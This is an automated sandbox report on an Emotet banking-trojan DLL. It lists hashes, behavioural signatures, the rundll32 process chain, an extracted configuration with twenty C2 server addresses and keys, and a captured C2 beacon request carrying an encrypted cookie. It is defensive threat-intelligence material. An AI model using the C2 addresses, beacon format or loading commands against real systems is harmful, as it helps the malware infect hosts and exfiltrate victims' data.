Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report spZRMihlrkFGqYq1f.dll

Overview

General Information

Sample Name:spZRMihlrkFGqYq1f.dll
Analysis ID:531996
MD5:9f4fa905fd685d28c4ff28f24ad224a1
SHA1:e186e0869276d3af6465d7c754b22527c7ac2ced
SHA256:808e8247efd685bdbae3ea0e55de1e8ed8aecd1359a213b0c6291b73f007fdaf
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Emotet RunDLL32 Process Creation
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Program does not show much activity (idle)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Checks if the current process is being debugged
Potential key logger detected (key state polling based)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6816 cmdline: loaddll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6796 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6860 cmdline: rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6880 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6792 cmdline: rundll32.exe C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 4928 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis",ayowadvg MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 3476 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 6836 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4864 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6940 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6904 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.1231555705.0000000003380000.00000040.00000010.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000006.00000002.715083656.00000000042D1000.00000020.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000007.00000002.1232688117.0000000005A90000.00000040.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000003.00000002.712245563.00000000046E0000.00000040.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 29 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.rundll32.exe.5880000.10.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              7.2.rundll32.exe.56b0000.6.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                3.2.rundll32.exe.4910000.9.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  3.2.rundll32.exe.3f80000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    7.2.rundll32.exe.59a0000.13.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 46 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Emotet RunDLL32 Process CreationShow sources
                      Source: Process startedAuthor: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis",ayowadvg, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 4928, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL, ProcessId: 3476

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 7.2.rundll32.exe.5970000.12.raw.unpackMalware Configuration Extractor: Emotet {"C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: spZRMihlrkFGqYq1f.dllMetadefender: Detection: 42%Perma Link
                      Source: spZRMihlrkFGqYq1f.dllReversingLabs: Detection: 56%
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.4:49775 version: TLS 1.2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002592C lstrlenA,FindFirstFileA,FindClose,3_2_1002592C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002F3E9 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,3_2_1002F3E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE1A80 FindFirstFileW,7_2_04EE1A80

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.4:49775 -> 51.178.61.60:443
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 51.178.61.60 187Jump to behavior
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 51.178.61.60:443
                      Source: Malware configuration extractorIPs: 168.197.250.14:80
                      Source: Malware configuration extractorIPs: 45.79.33.48:8080
                      Source: Malware configuration extractorIPs: 196.44.98.190:8080
                      Source: Malware configuration extractorIPs: 177.72.80.14:7080
                      Source: Malware configuration extractorIPs: 51.210.242.234:8080
                      Source: Malware configuration extractorIPs: 185.148.169.10:8080
                      Source: Malware configuration extractorIPs: 142.4.219.173:8080
                      Source: Malware configuration extractorIPs: 78.47.204.80:443
                      Source: Malware configuration extractorIPs: 78.46.73.125:443
                      Source: Malware configuration extractorIPs: 37.44.244.177:8080
                      Source: Malware configuration extractorIPs: 37.59.209.141:8080
                      Source: Malware configuration extractorIPs: 191.252.103.16:80
                      Source: Malware configuration extractorIPs: 54.38.242.185:443
                      Source: Malware configuration extractorIPs: 85.214.67.203:8080
                      Source: Malware configuration extractorIPs: 54.37.228.122:443
                      Source: Malware configuration extractorIPs: 207.148.81.119:8080
                      Source: Malware configuration extractorIPs: 195.77.239.39:8080
                      Source: Malware configuration extractorIPs: 66.42.57.149:443
                      Source: Malware configuration extractorIPs: 195.154.146.35:443
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: Joe Sandbox ViewASN Name: EcobandGH EcobandGH
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: GET /ZKzoaCRaSGPOqJVHjhZJzdCfaeZvESlfQfwHxNYMOhGmjZbKSRXfZNvJ HTTP/1.1Cookie: BbabBTNqIR=qrh4znIW0vRoZUgVJJVgzfQvY9C+RpRussFCR/fGFdtMBlPVybXrZsLF92dUNSOaN7UtApPRkIXlq1+7rNMFKl/GD+kwN0+UKJ1vSTU/v1LmGzXvNL9Y6Ncf4sehP3YL6oaRsTpSuU6YzoarwBbK29kvoAsGOYRv6Xj3viHnIeOCY6VwhklOKsvWD+GGQWp/+KzcLqZXdf6vX1pw51ydx7BZAIYsZ4oO5HPx+C0OX/W7prasTQF+SxpB+l8kw9kHpKuLSE3MN5eruU/U1ZyDN8wwOUnkB9ePec54mFaBjmfD1QEzkF2yYIRzHwr7O5Mz0xHblcofjcNex7IClSGUVtOK3eIwHost: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 207.148.81.119 207.148.81.119
                      Source: Joe Sandbox ViewIP Address: 196.44.98.190 196.44.98.190
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: svchost.exe, 0000000C.00000003.824839252.000001A770389000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.facebook.com (Facebook)
                      Source: svchost.exe, 0000000C.00000003.824839252.000001A770389000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.twitter.com (Twitter)
                      Source: svchost.exe, 0000000C.00000003.824839252.000001A770389000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.824813205.000001A7703A0000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-26T13:57:30.0386475Z||.||6f0c105d-3db6-47de-894d-fd95973349e2||1152921505694224549||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                      Source: svchost.exe, 0000000C.00000003.824839252.000001A770389000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.824813205.000001A7703A0000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-26T13:57:30.0386475Z||.||6f0c105d-3db6-47de-894d-fd95973349e2||1152921505694224549||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                      Source: svchost.exe, 0000000C.00000002.841835956.000001A770300000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 0000000C.00000003.818284709.000001A77038B000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818383957.000001A770802000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818022632.000001A7703A2000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818039351.000001A7703A2000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818344967.000001A770372000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EF1027 InternetReadFile,7_2_04EF1027
                      Source: global trafficHTTP traffic detected: GET /ZKzoaCRaSGPOqJVHjhZJzdCfaeZvESlfQfwHxNYMOhGmjZbKSRXfZNvJ HTTP/1.1Cookie: BbabBTNqIR=qrh4znIW0vRoZUgVJJVgzfQvY9C+RpRussFCR/fGFdtMBlPVybXrZsLF92dUNSOaN7UtApPRkIXlq1+7rNMFKl/GD+kwN0+UKJ1vSTU/v1LmGzXvNL9Y6Ncf4sehP3YL6oaRsTpSuU6YzoarwBbK29kvoAsGOYRv6Xj3viHnIeOCY6VwhklOKsvWD+GGQWp/+KzcLqZXdf6vX1pw51ydx7BZAIYsZ4oO5HPx+C0OX/W7prasTQF+SxpB+l8kw9kHpKuLSE3MN5eruU/U1ZyDN8wwOUnkB9ePec54mFaBjmfD1QEzkF2yYIRzHwr7O5Mz0xHblcofjcNex7IClSGUVtOK3eIwHost: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.4:49775 version: TLS 1.2
                      Source: loaddll32.exe, 00000000.00000002.714043179.0000000000BFB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10014B67 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,3_2_10014B67
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002C51C ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,3_2_1002C51C

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 7.2.rundll32.exe.5880000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.56b0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4910000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3f80000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.59a0000.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4880000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4880000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5a90000.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4a40000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5bd0000.17.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.46e0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.34d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.56e0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5a90000.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5970000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5ba0000.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5ba0000.16.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4710000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4f80000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ea0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4a40000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.41a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.3380000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.46e0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.42d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.58b0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ed0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4a70000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4040000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4040000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5880000.10.unpack, type: UNPACKEDPE
